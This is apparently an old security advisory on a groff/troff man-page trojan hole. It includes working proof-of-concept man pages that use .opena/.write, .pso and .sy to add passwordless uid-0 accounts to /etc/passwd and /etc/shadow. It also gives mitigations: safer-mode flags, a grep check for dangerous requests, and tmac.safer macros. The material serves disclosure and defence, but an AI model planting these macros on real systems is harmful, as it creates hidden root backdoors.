groff, nroff, troff
Those using groff
Pawel Wilk found following. It's possible security danger. The
trick is that it can get you if you as a system administrator
download some open source program from the Internet, and build
and install that program; such activity often happens as "root",
so a couple of scenarios are possible:
(1) Root installs the malicious roff source unknowingly.
(2) During the process of building/installing the program,
groff is invoked as root to create a pre-formatted version
of the manual page (a "cat page"), at which point the
trojan horse does it dirty work.
Take a look at following (it's messy):
.\" Copyright (c) 1999 Pawe=B3 Wilk <>
.\" This is free documentation; you can redistribute it and/or
.\" modify it under the terms of the GNU General Public License as
.\" published by the Free Software Foundation; either version 2 of
.\" the License, or (at your option) any later version.
.\" The GNU General Public License's references to "object code"
.\" and "executables" are to be interpreted as the output of any
.\" document formatting or typesetting system, including
.\" intermediate and printed output.
.\" This manual is distributed in the hope that it will be useful,
.\" but WITHOUT ANY WARRANTY; without even the implied warranty of
.\" GNU General Public License for more details.
.\" You should have received a copy of the GNU General Public
.\" License along with this manual; if not, write to the Free
.\" Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139,
.\" USA.
.TH MKROOT 9 "07-22-1999" "manual page" "Linux Hacker's Manual"
mkroot \- make a root-shell
.BI "man mkroot"
This manual page contains some \fBtroff\fP macros which could break your system's
security. If you are looking at this page being logged as root then you should know
that right in this moment you have allready created new, privileged account
called "sower". The account is disabled by default because of security reasons.
Don't forget to remove it! ;->
This is for information only.... use it at your own risk.
Manual pages are usualy based on \fBtroff\fP (see
.BR troff (1)
) macros. The point is, that some of these macros can access files or
even invoke some shell commands. It's usable, but try to imaginate
that the \fBtroff\fP macros contained in manual pages may have root privileges
if the \fBtroff\fP command's caller is root. (!)
The most dangerous macros are:
.BI ".pso" " command"
used to display output of some \fIcommand\fP
.BI ".write" " stream string"
used to put the \fIstring\fP into the given \fIstream\fP
.BI "/root directory listing" " .pso ls -l /root"
.pso ls -l /root=20
.BI "creating new user called sower (passwd)" " "
.opena stream /etc/passwd
.write stream sower:*:0:0::/:/dev/null
.opena stream /etc/passwd
.write stream sower:!:0:0::/:/dev/null
.BI "little preview" " .pso tail /etc/passwd"
.pso tail /etc/passwd
.BI "playing with shadow" ""
.opena stream /etc/shadow
.write stream sower:*:10531:0:99999:7::10794:
.opena stream /etc/shadow
.write stream sower:*:10531:0:99999:7::10794:
.BI "fingering new user" " .pso finger sower"
.pso finger sower
.I /etc/passwd
.I /etc/shadow
.BR man (1),
.BR passwd (1),
.BR troff (1).
Redhat 5.2 is vulnerable. Both Debian slink and potato are not.
Both use groff 1.11a, but Debian's is patched. It appears that
stock groff 1.11a is vulnerable, probably any older groff, as
And now the most obvious one. ".sy" executes system() on the
specified command string. After reading Bruce Schneiers latest
CRYPTO-GRAM (July 15) where its said:
Microsoft, they weren't the first. When Bob Morris' Internet
Worm was making the rounds about 10 years ago and when the
missing semicolon brought down Signalling System 7, we were
hypothesizing about the possibility of data-borne viruses. I
found a neat feature of troff that allows you to make a call
to a UNIX shell, which would make a virus or worm much easier
to create. I don't know how long before we saw it that this
nice feature was there, but I can imagine that it's been a
Joel Eriksson examined the troff-manpage on Linux-system and
found three things to be worried, first the .open/.opena and
.write commands, then the .pso command, and last but not least
the "sy request" that is mentioned here
The return value of the system() function executed by
the last sy request.
Here are the three man-pages Joel did to add an account to the
passwd in different ways. A little easier to read though, since he
skip the copyright and the normal troff commands..
[root@hades ~/security/troff]# ls -al
total 5
drwx------ 2 root root 1024 Jul 19 11:25 .
drwx------ 23 root root 1024 Jul 24 20:42 ..
-rw------- 1 root root 60 Jul 19 11:19 r00t.1
-rw------- 1 root root 45 Jul 19 11:22 r00t.2
-rw------- 1 root root 46 Jul 19 11:25 r00t.3
[root@hades ~/security/troff]#
And here are the contents. r00t.1:
.opena f /etc/passwd
.write f r00t::0:0::/:/bin/sh
.close f
.sy echo r00t::0:0::/:/bin/sh >> /etc/passwd
.pso echo r00t::0:0::/:/bin/sh >> /etc/passwd
One Linux distribution that doesn't appear to be vulnerable is
Debian (tested on 2.1/slink) - the maintainer of the groff
package has made the -S ("Safer mode") the default, which turns
off potentially dangerous commands like .opena, .pso, etc.
Hopefully this change can make it into the official GNU groff
distribution - as useful as these features may be, I doubt the
majority of people use groff for much more than formatting
manpages. Safe defaults are always good. When you give -S to
groff it passes -S to pic and -msafer to troff. Thus:
use -S with groff
use -S with pic
use -msafer with troff
use -msafer with nroff
Unfortunately, this wouldn't affect xman, which doesn't know about
man.conf and always use hardcoded commandline:
viper:~% strings `which xman` | grep -i roff | geqn | gtbl | groff -Tascii -mandoc
This is defined as `FORMAT' macro in xman/vendor.h (and slightly
modified with x11r6-contrib-3.1.2-mandoc.patch in RedHat rpm), and
can't be customized with environment/resources. There are many
other help/manpage browsers (helptool, gnome-help-browser come to
mind), so the right thing is to modify groff.
OpenBSD-current has been fixed to pass the -S (safer mode) option
to groff from the script. Please see the following URL:
NetBSD did the same, more or less -- that is, man.conf was changed
to use -S and the nroff script was hacked to permit the -S option
to it.
With accurately set permissions for man page directories,
non-privileged users shouldn't be able to add manual pages to the
system (if they are able to, system is whacked anyway), so take
this threat merely as another trojan possibility - quite uncommon
one indeed.
Don't look at them _at_all_ before checking them for dangerous
troff-commands. What this also means is SGID man is probably not
a good idea (a method that is used to avoid having the
preformatted manualpage cache, catman, directories
worldwriteable). A "fix" to the problem would be to introduce a
commandswitch for enabling the dangerous troff-commands.
Joel made the following shellfunction in my .profile (bash) to
check for potentially dangerous troff-commands in manualpages:
checkman() {
grep "^\(\.open\|\.sy\|\.pso\)" $* && echo 'Wewps!' || echo 'OK!'
This lets you either specify files on the commandline or pipe the
output of files to the shellfunction (if the manpage is gzip'ed
one would like to gunzip -c it and pipe to "checkman" instead of
checking the compressed file ..).
The tmac.safer package simply removes the offending commands and
replaces them with something that prints a warning. For those who
can read troff:
.rm open opena pso sy pi
.de unsafe
.tm \\n(.F:\\n(.c: unsafe to execute request `\\$1'
.als open unsafe
.als opena unsafe
.als pso unsafe
.als sy unsafe
.als pi unsafe
This is not a *new* security problem, thus has been known for
decades and ranks with trojan in VI and TeX and sh shel. Spafford
published a worm or virus written in TeX. Also in VI it is/was
(depending on your system and which version of VI you have
installed) possible to have arbitrary commands executed as the
file was edited. It is believed the syntax was:
#exec <command>
and it had to be one of the first five lines in the file.